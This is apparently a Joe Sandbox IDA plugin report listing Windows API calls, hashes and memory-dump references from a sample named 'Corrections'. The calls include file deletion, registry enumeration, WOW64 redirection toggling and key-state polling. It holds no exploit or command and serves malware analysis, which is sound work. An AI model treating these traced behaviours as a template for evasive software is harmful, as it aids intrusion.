                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                            • Opcode ID: c02b5fa74a5a900314d0478b269431f67132e715f863c1c4152443ef506e4aff
                                                                                                                                                                                                                                                                                            • Instruction ID: cf4be082d4df5fc8771f9eb654bdefcfe742d2c7d09f57f19c3edb555b19048f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c02b5fa74a5a900314d0478b269431f67132e715f863c1c4152443ef506e4aff
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE0CD36A1B6321792171729BC0CB5E652CDFC2F36F050325FC00D2508EF54CC0280E5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00965657,?,?,009262FA,?,00000001,?,?,00000000), ref: 00926610
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00926622
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00965657,?,?,009262FA,?,00000001,?,?,00000000), ref: 00926635
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                            • Opcode ID: 68f60ae4f0484dd3ec70ba7edd2106cbe5671754fe5daf8ea14702bb1dea24ce
                                                                                                                                                                                                                                                                                            • Instruction ID: ab266186912ca5d9a673ae135a72890fd70aaf06e362c464428bdfaff1b7a887
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68f60ae4f0484dd3ec70ba7edd2106cbe5671754fe5daf8ea14702bb1dea24ce
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DD05B3562B63657523637297D1C9CF7B1C9ED1F313050129F800A611CEF64CD12D5D8
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009935C4
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00993646
                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0099365C
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0099366D
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0099367F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f7e51dca15b91d8bc2eed1d45b75f70610772fd2ea430b84bc70ce79488203d9
                                                                                                                                                                                                                                                                                            • Instruction ID: f6038c4b68a1e54a40927682205888b9dd9b64b6717fe9cb2818348ecd5bfef4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7e51dca15b91d8bc2eed1d45b75f70610772fd2ea430b84bc70ce79488203d9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEB14D72D01129ABDF15DFA8CC85FDEBBBDEF89314F0080A6F509E6151EA349B448B61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 009AAE87
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009AAE95
                                                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009AAEC8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 009AB09D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a643156c72c331f56de23b625682d208dc5e81c4d9ffc9e6519efb3591f560d7
                                                                                                                                                                                                                                                                                            • Instruction ID: 7b7bdaaa97ebfdc12630e97654d63c6034bea3903bc12b49f89c62b1a8b4f93c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a643156c72c331f56de23b625682d208dc5e81c4d9ffc9e6519efb3591f560d7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99A19071A04311AFE720DF24D886B2AB7E5AF88714F14885DF5999B392D771EC40CB82
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD451
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009AC505
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009AC560
                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009AC5C3
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 009AC606
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 009AC613
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8745b9c3e6ceaec9d224bd2576d9dda604e0c9dd9a78f7976803986ed94ac0b5
                                                                                                                                                                                                                                                                                            • Instruction ID: 8d644311eeab1437470fd842ae6ad1b277fe71bbb33a33ba4adda757ac350ff1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8745b9c3e6ceaec9d224bd2576d9dda604e0c9dd9a78f7976803986ed94ac0b5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E61A171608241AFC714DF14C890F6ABBE9FF85308F54895CF09A8B2A2DB31ED45CB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0098D7CD,?), ref: 0098E714
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0098D7CD,?), ref: 0098E72D
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098EAB0: GetFileAttributesW.KERNEL32(?,0098D840), ref: 0098EAB1
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0098ED8A
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0098EDC3
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098EF02
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098EF1A
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0098EF67
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 83c2b5c082d6cec5b18315f36cc03edd7c508b459b537bc01444262892b04dac
                                                                                                                                                                                                                                                                                            • Instruction ID: f26322edc3cdccdac87aef83b1f2bc82274d2f9c572ee29df0dfebe2362e9f6d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83c2b5c082d6cec5b18315f36cc03edd7c508b459b537bc01444262892b04dac
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D85142B25083859BC724EB94DC91EDBB3ECAFC5350F00092EF689D3191EF75A6888756
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00989534
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 009895A5
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00989604
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00989677
                                                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009896A2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c89d6fd0ada9b0e43e788365ecbd3149db78f79c058d8d81ad78fca4ae8d200e
                                                                                                                                                                                                                                                                                            • Instruction ID: c4dd41ae6fc2d931e67612a03e0548e1c45188807f6a26dec355b70ab36a9f3f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c89d6fd0ada9b0e43e788365ecbd3149db78f79c058d8d81ad78fca4ae8d200e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F5159B5A0061AAFCB10DF58C884EAAB7F9FF89310B058559E906DB310E734E911CF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009995F3
                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0099961F
                                                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00999677
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0099969C
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009996A4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5faff70d7463b8bb81a4a496c7f4d2ce3f3f4df5d4c28deb6c5b461f361bc07c
                                                                                                                                                                                                                                                                                            • Instruction ID: c24918aa26b82c0d7878d39de89dd71a57667189b01ed925c64e326dac5eed44
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5faff70d7463b8bb81a4a496c7f4d2ce3f3f4df5d4c28deb6c5b461f361bc07c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2513C35A002159FCF05DF69C885E6ABBF5FF88314F098058E849AB362CB35ED41CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 009A999D
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009A9A2D
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 009A9A49
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009A9A8F
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 009A9AAF
                                                                                                                                                                                                                                                                                              • Part of subcall function 0093F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00991A02,?,753CE610), ref: 0093F9F1
                                                                                                                                                                                                                                                                                              • Part of subcall function 0093F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00980354,00000000,00000000,?,?,00991A02,?,753CE610,?,00980354), ref: 0093FA18
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c979d1de801644e62d0094e97836435e500bf172139be8ca151a5cd4a3e00ef4
                                                                                                                                                                                                                                                                                            • Instruction ID: c6e88ba9de107606bdd399bfa5c3d8d99f6ce06378304b5bd9b8102c01cb48e9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c979d1de801644e62d0094e97836435e500bf172139be8ca151a5cd4a3e00ef4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4515B39605215DFCB00DF68C4849ADBBF4FF4A314B1581A9E80AAB762D731ED86CF81
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 009B766B
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 009B7682
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 009B76AB
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0099B5BE,00000000,00000000), ref: 009B76D0
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 009B76FF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d455200ac3a793b4bd0d83c1ab01ecddab1bf0de8ba066edcf07d6503792e211
                                                                                                                                                                                                                                                                                            • Instruction ID: 3c6f864be5feaa8b79d96a6ca9056c73c2cf93fd7fb177b1d471f2f8b553f845
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d455200ac3a793b4bd0d83c1ab01ecddab1bf0de8ba066edcf07d6503792e211
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B41E235A08504EFC7248FACCE88FE9BBA9EB89370F150364F815A72E0D670ED40DA51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3b0f5b6367053c3dffc6f3c16e37a2044ad6c2cb861582f64dc753e5549ea24a
                                                                                                                                                                                                                                                                                            • Instruction ID: 56f81522e5e3c73af79abe2bb6fc73aef0b636d76b9288b9d22fc952f1bc07b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b0f5b6367053c3dffc6f3c16e37a2044ad6c2cb861582f64dc753e5549ea24a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1341E332A002009FCB20DF79C881A6EB3F5EF8A315F2585A8E915EB391D731ED05DB80
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 009219E1
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 009219FE
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00921A23
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00921A3D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 06fd5234d2cb78e7ab4419b694dbf82c5df2b91714a220f6646047e8836df823
                                                                                                                                                                                                                                                                                            • Instruction ID: d50234995c74fa545964bd7d2e180e19ad2e6a57c42cbd0f0a6581a72e1cfd61
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06fd5234d2cb78e7ab4419b694dbf82c5df2b91714a220f6646047e8836df823
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A418E71A0811AFFDF15DFA8D844BEEB774FB16324F20831AE429A2290D7346A50DB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00994310
                                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00994367
